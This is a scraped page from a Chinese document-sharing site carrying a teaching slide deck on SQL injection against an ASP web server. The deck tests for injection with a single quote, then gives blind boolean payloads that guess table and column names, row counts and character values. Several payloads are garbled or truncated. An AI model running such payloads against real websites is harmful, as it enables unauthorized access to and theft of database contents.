- 3
- 0
- 约小于1千字
- 约 13页
- 2018-02-28 发布于天津
- 举报
基于web服务器SQL的入侵与防护;CONTENTS;web服务器SQL注入;搜寻网站SQL注入点
尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***加个号“’”,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。
点击北京链接会发现地址栏中出现了变量,直接在后面加入“’”返回错误,初步判断有注入漏洞。
;;破解的流程如下:判断数据库表名—?判断数据库列名—判断列名字段个数—字段猜解
下面沾出实验的五个语句,然后慢慢带着大家破解
测试数据库中字段长度:
/index.asp?city=bjand (select top 1 len(tel)from info)10and1=1
猜测数据库中表
?and?exists?(select?*?from?admin)?and?1=1
;猜测数据库中字段子列
?and?exists?(select?admin?from?info)?and?1=1
利用二分法猜测数据库中的信息条数
?and?(select?Count(1)?from?[info]?where?1=1)?between?0?and?100?and?1=1
猜测数据库中值得代码
/index.asp?city=bjand (select top 1 asc(mid(city,1,1))
您可能关注的文档
- 海带栽培学5(收割_加工_病害)演示课件文.ppt
- 海尔施特劳斯智饮机十一网络营销方案演示课件文.pptx
- 海尔小管家智能照明河南省演示课件文.pptx
- 海关商品学3商品品种演示课件文.ppt
- 海河平原冬小麦节水超高产栽培技术体系研究与应用演示课件文.ppt
- 海口丹娜游艇都会设计方案演示课件文.pptx
- 海隆兴光电公司筒灯培训演示课件文.ppt
- 海伦国际`2012让昆明重新想象——海伦国际2012年营销策略报告_终稿演示课件文.ppt
- 海门北京路项目市场调研报告金演示课件文.ppt
- 海门永泓花园项目市场策划报告演示课件文.ppt
- HY-Power 技术手册 HY-DW 系列 技术手册.pdf
- HY-IOS 技术手册 HY-IOS 串口IO系列产品规格书.pdf
- ITW EAE 电子组装设备 Printers dispensers selective reflow and wave soldering systems cleaning systems thermal processing equipment 技术手册.pdf
- SSEmE 技术手册 STM8 STM32 技术手册.pdf
- HY118系列 湖南声仪测控科技有限公司 使用说明书 HY0 464 019SY 用户手册.pdf
- HY-PT300 PT500 入门指南说明书用户手册.pdf
- IAR Systems IAR Visual State User Guide UVS-14说明书用户手册.pdf
- Honor荣耀 用户手册 AL00 TL00 用户手册.pdf
- IAR Embedded Workbench 用户手册 I-jet-2说明书.pdf
- HAYEAR用户手册 HY-6110工业相机 V1.2(中文版).pdf
原创力文档

文档评论(0)